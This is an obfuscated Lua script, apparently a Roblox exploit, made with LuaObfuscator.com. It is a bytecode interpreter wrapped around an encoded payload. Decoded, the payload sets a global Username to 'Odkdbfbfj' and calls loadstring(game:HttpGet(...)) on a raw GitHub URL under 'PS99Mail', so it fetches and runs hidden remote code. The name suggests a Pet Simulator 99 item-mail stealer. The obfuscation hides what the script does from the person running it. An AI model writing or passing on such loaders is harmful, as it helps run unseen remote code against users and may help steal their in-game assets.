--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v79=0;while true do if (v79==0) then v19=v0(v3(v30,1,1));return "";end end else local v80=0;local v81;while true do if (v80==0) then v81=v2(v0(v30,16));if v19 then local v96=v5(v81,v19);v19=nil;return v96;else return v81;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v82=(v31/(((882 -(282 + 595)) -3)^(v32-((1639 -(1523 + 114)) -1))))%(2^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v82-(v82%(932 -(771 + 86 + 74))) ;else local v83=(570 -((523 -156) + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v83 + v83))>=v83) and ((1066 -(68 + 997)) + 0)) or (0 + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + (8 -6) ;return (v36 * (373 -(32 + 85))) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (9 -5) ;return (v40 * 16777216) + (v39 * (14533 + 51003)) + (v38 * (469 -213)) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=1188 -(1069 + (1256 -(116 + 1022))) ;local v44=(v20(v42,(1461 -1110) -(52 + 35 + 263) ,20) * ((3 -1)^(6 + 26))) + v41 ;local v45=v20(v42,201 -(67 + 113) ,23 + 8 );local v46=((v20(v42,78 -46 )==(3 -2)) and  -(1 + 0)) or (3 -2) ;if (v45==(952 -(802 + 150))) then if (v44==(0 -0)) then return v46 * (0 -0) ;else v45=1 -0 ;v43=438 -(145 + (1069 -776)) ;end elseif (v45==(1490 + 557)) then return ((v44==(997 -(915 + 82))) and (v46 * ((1487 -(998 + 488))/(0 -0)))) or (v46 * NaN) ;end return v8(v46,v45-(596 + (1516 -1089)) ) * (v43 + (v44/((774 -(201 + 571))^(68 -16)))) ;end local function v25(v47)local v48=0 -0 ;local v49;local v50;while true do if (v48==(860 -(814 + (176 -131)))) then v49=v3(v16,v18,(v18 + v47) -((1 + 1) -(1 + 0)) );v18=v18 + v47 ;v48=1 + 1 ;end if ((6 -4)==v48) then v50={};for v87=1 + 0 , #v49 do v50[v87]=v2(v1(v3(v49,v87,v87)));end v48=888 -(261 + 624) ;end if (v48==(0 -0)) then v49=nil;if  not v47 then local v95=1080 -(1020 + 60) ;while true do if (v95==0) then v47=v23();if (v47==(766 -(745 + 21))) then return "";end break;end end end v48=1424 -((1685 -(87 + 968)) + 793) ;end if (v48==(7 -4)) then return v6(v50);end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if ((1 -0)==v51) then v54=nil;v55=nil;v51=1992 -(582 + 1408) ;end if (v51==(0 -0)) then v52=0;v53=nil;v51=1 -0 ;end if (v51==2) then v56=nil;v57=nil;v51=3;end if (v51~=3) then else v58=nil;while true do local v89=0;local v90;while true do if (v89==(0 -0)) then v90=0;while true do if (v90==1) then if (0==v52) then v53={};v54={};v55={};v56={v53,v54,nil,v55};v52=242 -(187 + 54) ;end break;end if (v90~=(780 -(162 + 618))) then else if (v52~=1) then else local v115=0;while true do if ((0 + 0)~=v115) then else v57=v23();v58={};v115=1 + 0 ;end if (v115==(3 -1)) then v52=2;break;end if (v115==1) then for v153=1 -0 ,v57 do local v154=0 + 0 ;local v155;local v156;while true do if (v154==0) then local v167=1636 -(1373 + 263) ;while true do if (v167==(1000 -(451 + 549))) then v155=v21();v156=nil;v167=1;end if ((1 + 0)~=v167) then else v154=1;break;end end end if (v154==1) then if (v155==(1 -0)) then v156=v21()~=(0 -0) ;elseif (v155==(1386 -(746 + 638))) then v156=v24();elseif (v155==(2 + 1)) then v156=v25();end v58[v153]=v156;break;end end end v56[4 -1 ]=v21();v115=343 -(218 + 123) ;end end end if (v52~=(1583 -(1535 + 46))) then else local v116=0 + 0 ;while true do if (v116~=(1 + 0)) then else return v56;end if (v116~=0) then else for v157=561 -(306 + 254) ,v23() do local v158=0;local v159;local v160;local v161;while true do if ((0 + 0)==v158) then v159=0 -0 ;v160=nil;v158=1;end if (v158==(1468 -(899 + 568))) then v161=nil;while true do if (v159~=0) then else local v169=0 + 0 ;local v170;while true do if (0~=v169) then else v170=0 -0 ;while true do if (v170==(603 -(268 + 335))) then local v176=290 -(60 + 230) ;while true do if (v176==1) then v170=1;break;end if (v176==0) then v160=572 -(426 + 146) ;v161=nil;v176=1 + 0 ;end end end if (v170~=1) then else v159=1;break;end end break;end end end if (v159==(1457 -(282 + 1174))) then while true do if ((811 -(569 + 242))==v160) then v161=v21();if (v20(v161,1,2 -1 )==(0 + 0)) then local v171=1024 -(706 + 318) ;local v172;local v173;local v174;local v175;while true do if (0==v171) then v172=1251 -(721 + 530) ;v173=nil;v171=1;end if (v171==2) then while true do if (v172~=(1273 -(945 + 326))) then else local v177=0;while true do if (v177~=(0 -0)) then else if (v20(v174,1,1 + 0 )~=1) then else v175[2]=v58[v175[702 -(271 + 429) ]];end if (v20(v174,2 + 0 ,2)~=(1501 -(1408 + 92))) then else v175[3]=v58[v175[1089 -(461 + 625) ]];end v177=1289 -(993 + 295) ;end if (v177==(1 + 0)) then v172=3;break;end end end if (v172==(1171 -(418 + 753))) then v173=v20(v161,1 + 1 ,3);v174=v20(v161,4,6);v172=1 + 0 ;end if (v172~=(1 + 2)) then else if (v20(v174,1 + 2 ,3)==1) then v175[4]=v58[v175[4]];end v53[v157]=v175;break;end if (v172~=1) then else local v179=529 -(406 + 123) ;while true do if (v179~=1) then else v172=2;break;end if (v179~=0) then else v175={v22(),v22(),nil,nil};if (v173==0) then local v186=0;local v187;local v188;while true do if (v186==(1 + 0)) then while true do if (v187==0) then v188=1145 -(466 + 679) ;while true do if (v188==0) then v175[6 -3 ]=v22();v175[11 -7 ]=v22();break;end end break;end end break;end if ((1900 -(106 + 1794))==v186) then v187=0;v188=nil;v186=1 + 0 ;end end elseif (v173==(1 + 0)) then v175[3]=v23();elseif (v173==(5 -3)) then v175[7 -4 ]=v23() -(2^(130 -(4 + 110))) ;elseif (v173==(587 -(57 + 527))) then local v191=0;local v192;local v193;while true do if (v191~=(1427 -(41 + 1386))) then else v192=103 -(17 + 86) ;v193=nil;v191=1 + 0 ;end if (v191==(1 -0)) then while true do if (v192==0) then v193=0;while true do if (v193==(0 -0)) then v175[169 -(122 + 44) ]=v23() -((2 -0)^(52 -36)) ;v175[4 + 0 ]=v22();break;end end break;end end break;end end end v179=1;end end end end break;end if (v171~=(1 + 0)) then else v174=nil;v175=nil;v171=3 -1 ;end end end break;end end break;end end break;end end end for v162=66 -(30 + 35) ,v23() do v54[v162-(1 + 0) ]=v28();end v116=1;end end end v90=1;end end break;end end end break;end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v65=v62;local v66=v63;local v67=v64;local v68=v27;local v69=1;local v70= -1;local v71={};local v72={...};local v73=v12("#",...) -1 ;local v74={};local v75={};for v84=0,v73 do if (v84>=v67) then v71[v84-v67 ]=v72[v84 + 1 ];else v75[v84]=v72[v84 + 1 ];end end local v76=(v73-v67) + 1 ;local v77;local v78;while true do v77=v65[v69];v78=v77[1];if (v78<=9) then if (v78<=4) then if (v78<=1) then if (v78>0) then v75[v77[2]]();elseif ((v77[3]=="_ENV") or (v77[3]=="getfenv")) then v75[v77[2]]=v61;else v75[v77[2]]=v61[v77[3]];end elseif (v78<=2) then do return;end elseif (v78>3) then v61[v77[3]]=v75[v77[2]];else v61[v77[3]]=v75[v77[2]];end elseif (v78<=6) then if (v78>5) then local v97=v77[2];local v98,v99=v68(v75[v97](v13(v75,v97 + 1 ,v77[3])));v70=(v99 + v97) -1 ;local v100=0;for v112=v97,v70 do v100=v100 + 1 ;v75[v112]=v98[v100];end elseif ((v77[3]=="_ENV") or (v77[3]=="getfenv")) then v75[v77[2]]=v61;else v75[v77[2]]=v61[v77[3]];end elseif (v78<=7) then local v101=v77[2];v75[v101]=v75[v101](v13(v75,v101 + 1 ,v70));elseif (v78==8) then v69=v77[3];else local v128=0;local v129;while true do if (0==v128) then v129=v77[2];v75[v129]=v75[v129](v13(v75,v129 + 1 ,v70));break;end end end elseif (v78<=14) then if (v78<=11) then if (v78>10) then local v103=0;local v104;local v105;while true do if (v103==0) then v104=v77[2];v105=v75[v77[3]];v103=1;end if (v103==1) then v75[v104 + 1 ]=v105;v75[v104]=v105[v77[4]];break;end end elseif (v75[v77[2]]==v77[4]) then v69=v69 + 1 ;else v69=v77[3];end elseif (v78<=12) then v75[v77[2]]=v77[3];elseif (v78>13) then v75[v77[2]]=v77[3];else local v133=0;local v134;local v135;local v136;local v137;while true do if (v133==1) then v70=(v136 + v134) -1 ;v137=0;v133=2;end if (0==v133) then v134=v77[2];v135,v136=v68(v75[v134](v13(v75,v134 + 1 ,v77[3])));v133=1;end if (v133==2) then for v164=v134,v70 do v137=v137 + 1 ;v75[v164]=v135[v137];end break;end end end elseif (v78<=16) then if (v78==15) then do return;end else local v108=0;local v109;local v110;while true do if (v108==0) then v109=v77[2];v110=v75[v77[3]];v108=1;end if (1==v108) then v75[v109 + 1 ]=v110;v75[v109]=v110[v77[4]];break;end end end elseif (v78<=17) then v69=v77[3];elseif (v78>18) then if (v75[v77[2]]==v77[4]) then v69=v69 + 1 ;else v69=v77[3];end else v75[v77[2]]();end v69=v69 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365726E616D6503093O004F646B64626662666A030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F7269000F3O00120C3O00013O0026133O0001000100010004113O0001000100120C000100033O001203000100023O001205000100043O001205000200053O00200B00020002000600120C000400074O000D000200044O000700013O00022O00010001000100010004113O000E00010004113O000100012O000F3O00017O00",v9(),...);
